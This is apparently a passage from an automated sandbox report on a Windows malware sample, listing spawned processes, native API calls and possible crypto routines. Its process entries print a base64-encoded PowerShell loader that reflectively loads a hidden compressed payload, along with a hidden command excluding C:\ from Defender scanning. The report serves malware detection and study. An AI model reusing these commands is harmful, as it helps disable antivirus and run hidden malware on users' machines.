vZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENvbnZlcnQtQXNjaWlUb1N0cmluZyAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgIlVuZExkbC5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\user\UndLdl.ps1' -Encoding UTF8"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\UndLdl.ps1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENvbnZlcnQtQXNjaWlUb1N0cmluZyAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgIlVuZExkbC5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\user\UndLdl.ps1' -Encoding UTF8" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\UndLdl.ps1" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
Contains functionality to call native functions
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_0000024AB89530C7 RtlAllocateHeap,RtlAllocateHeap,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,RtlDeleteBoundaryDescriptor,RtlDeleteBoundaryDescriptor, 13_3_0000024AB89530C7
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C08A40 NtAcceptConnectPort, 13_3_00007DF488C08A40
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C08AFC NtAcceptConnectPort, 13_3_00007DF488C08AFC
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C09AF4 _malloc_dbg,NtAcceptConnectPort,NtAcceptConnectPort,??3@YAXPEAX@Z, 13_3_00007DF488C09AF4
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C08C08 NtAcceptConnectPort, 13_3_00007DF488C08C08
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C08C90 NtAcceptConnectPort, 13_3_00007DF488C08C90
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C09CA0 _calloc_dbg,NtAcceptConnectPort, 13_3_00007DF488C09CA0
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C08D74 NtAcceptConnectPort, 13_3_00007DF488C08D74
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C08D94 NtAcceptConnectPort, 13_3_00007DF488C08D94
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C09F40 NtAcceptConnectPort, 13_3_00007DF488C09F40
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C0B154 NtAcceptConnectPort,NtAcceptConnectPort, 13_3_00007DF488C0B154
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C0B088 NtAcceptConnectPort,NtAcceptConnectPort, 13_3_00007DF488C0B088
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C092CC NtAcceptConnectPort,_calloc_dbg,DuplicateHandle,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort, 13_3_00007DF488C092CC
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C0A2B0 NtAcceptConnectPort, 13_3_00007DF488C0A2B0
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C0A540 NtAcceptConnectPort, 13_3_00007DF488C0A540
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C0A600 NtAcceptConnectPort, 13_3_00007DF488C0A600
Source: C:\Windows\System32\OpenWith.exe Code function: 13_2_0000024AB87F0AC8 NtAcceptConnectPort,NtAcceptConnectPort, 13_2_0000024AB87F0AC8
Source: C:\Windows\System32\OpenWith.exe Code function: 13_2_0000024AB87F1A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler, 13_2_0000024AB87F1A90
Source: C:\Windows\System32\OpenWith.exe Code function: 13_2_0000024AB87F1CD0 RtlAllocateHeap,NtAcceptConnectPort,FindCloseChangeNotification, 13_2_0000024AB87F1CD0
Source: C:\Windows\System32\OpenWith.exe Code function: 13_2_0000024AB87F15AC NtAcceptConnectPort, 13_2_0000024AB87F15AC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71032868 NtAcceptConnectPort, 14_2_000001FF71032868
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_00401668 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 19_2_00401668
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_00401561 NtAllocateVirtualMemory, 19_2_00401561
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_0040156C NtAllocateVirtualMemory, 19_2_0040156C
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_00401673 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 19_2_00401673
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_0040157E NtAllocateVirtualMemory, 19_2_0040157E
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_00401599 NtAllocateVirtualMemory, 19_2_00401599
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_0040169C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 19_2_0040169C
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_0040159F NtAllocateVirtualMemory, 19_2_0040159F
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_004016A1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 19_2_004016A1
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_004016AA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 19_2_004016AA
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_004015AB NtAllocateVirtualMemory, 19_2_004015AB
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_00401668 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 22_2_00401668
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_00401561 NtAllocateVirtualMemory, 22_2_00401561
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_0040156C NtAllocateVirtualMemory, 22_2_0040156C
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_00401673 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 22_2_00401673
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_0040157E NtAllocateVirtualMemory, 22_2_0040157E
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_004025C5 NtEnumerateKey, 22_2_004025C5
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_00401599 NtAllocateVirtualMemory, 22_2_00401599
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_0040169C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 22_2_0040169C
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_0040159F NtAllocateVirtualMemory, 22_2_0040159F
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_004016A1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 22_2_004016A1
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_004016AA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 22_2_004016AA
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_004015AB NtAllocateVirtualMemory, 22_2_004015AB
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_00580607 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 24_2_00580607
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A4B92 RtlMoveMemory,NtUnmapViewOfSection, 25_2_030A4B92
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A33C3 NtQueryInformationFile, 25_2_030A33C3
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A342B NtQueryObject,NtQueryObject,RtlMoveMemory, 25_2_030A342B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle, 25_2_030A349B
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403532
Detected potential crypto function
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_00406DC6 0_2_00406DC6
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_0040759D 0_2_0040759D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0312F3E8 6_2_0312F3E8
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_0000024AB895279C 13_3_0000024AB895279C
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_0000024AB8951BA6 13_3_0000024AB8951BA6
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_0000024AB8952C3C 13_3_0000024AB8952C3C
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_0000024AB8954A38 13_3_0000024AB8954A38
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_0000024AB8955E7C 13_3_0000024AB8955E7C
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_0000024AB895557C 13_3_0000024AB895557C
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_0000024AB89558FC 13_3_0000024AB89558FC
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_0000024AB89524F7 13_3_0000024AB89524F7
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BF5BD8 13_3_00007DF488BF5BD8
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C17318 13_3_00007DF488C17318
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BFD850 13_3_00007DF488BFD850
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C46834 13_3_00007DF488C46834
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C37860 13_3_00007DF488C37860
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CB780C 13_3_00007DF488CB780C
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C217C4 13_3_00007DF488C217C4
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C2C7E8 13_3_00007DF488C2C7E8
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C077A0 13_3_00007DF488C077A0
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C2F954 13_3_00007DF488C2F954
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CC78D8 13_3_00007DF488CC78D8
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CC58AC 13_3_00007DF488CC58AC
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BF29FC 13_3_00007DF488BF29FC
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C46A10 13_3_00007DF488C46A10
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BE4A14 13_3_00007DF488BE4A14
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C34A14 13_3_00007DF488C34A14
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C3A9C4 13_3_00007DF488C3A9C4
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C46B20 13_3_00007DF488C46B20
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C0EC44 13_3_00007DF488C0EC44
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BF0C44 13_3_00007DF488BF0C44
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BE1BFC 13_3_00007DF488BE1BFC
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C38BE8 13_3_00007DF488C38BE8
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CC7CF4 13_3_00007DF488CC7CF4
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C39E68 13_3_00007DF488C39E68
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CC3DE0 13_3_00007DF488CC3DE0
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CCCF3C 13_3_00007DF488CCCF3C
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C56F20 13_3_00007DF488C56F20
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C2CEC4 13_3_00007DF488C2CEC4
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BFBEC4 13_3_00007DF488BFBEC4
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CBC01C 13_3_00007DF488CBC01C
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C46F78 13_3_00007DF488C46F78
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C36FA0 13_3_00007DF488C36FA0
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C4B094 13_3_00007DF488C4B094
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C840A0 13_3_00007DF488C840A0
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CC8238 13_3_00007DF488CC8238
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C2D210 13_3_00007DF488C2D210
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CC11BC 13_3_00007DF488CC11BC
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CD41DC 13_3_00007DF488CD41DC
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BF3314 13_3_00007DF488BF3314
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C2C45C 13_3_00007DF488C2C45C
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C5A3F4 13_3_00007DF488C5A3F4
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CD93FC 13_3_00007DF488CD93FC
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BEE414 13_3_00007DF488BEE414
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CC83B8 13_3_00007DF488CC83B8
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CC73A0 13_3_00007DF488CC73A0
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C38534 13_3_00007DF488C38534
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C4F4FC 13_3_00007DF488C4F4FC
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BF4480 13_3_00007DF488BF4480
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CC8750 13_3_00007DF488CC8750
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CD46F8 13_3_00007DF488CD46F8
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C7B68C 13_3_00007DF488C7B68C
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BFD688 13_3_00007DF488BFD688
Source: C:\Windows\System32\OpenWith.exe Code function: 13_2_0000024AB87F0C5C 13_2_0000024AB87F0C5C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71032D00 14_2_000001FF71032D00
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7102262C 14_2_000001FF7102262C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7103E368 14_2_000001FF7103E368
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7105CBBC 14_2_000001FF7105CBBC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF710663FC 14_2_000001FF710663FC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71060238 14_2_000001FF71060238
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71037240 14_2_000001FF71037240
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7102C254 14_2_000001FF7102C254
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71035AAC 14_2_000001FF71035AAC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71060D58 14_2_000001FF71060D58
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71055578 14_2_000001FF71055578
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7105959C 14_2_000001FF7105959C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71054DB0 14_2_000001FF71054DB0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7103F5E8 14_2_000001FF7103F5E8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71050440 14_2_000001FF71050440
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7105ECAC 14_2_000001FF7105ECAC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7103DCB4 14_2_000001FF7103DCB4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF710214D0 14_2_000001FF710214D0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71046CE0 14_2_000001FF71046CE0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7103C720 14_2_000001FF7103C720
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71053F38 14_2_000001FF71053F38
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7105A7E4 14_2_000001FF7105A7E4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7103CFE0 14_2_000001FF7103CFE0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7104D81C 14_2_000001FF7104D81C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7104764C 14_2_000001FF7104764C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71043E6C 14_2_000001FF71043E6C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7104867C 14_2_000001FF7104867C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7103BE88 14_2_000001FF7103BE88
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71055E90 14_2_000001FF71055E90
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71036EF4 14_2_000001FF71036EF4
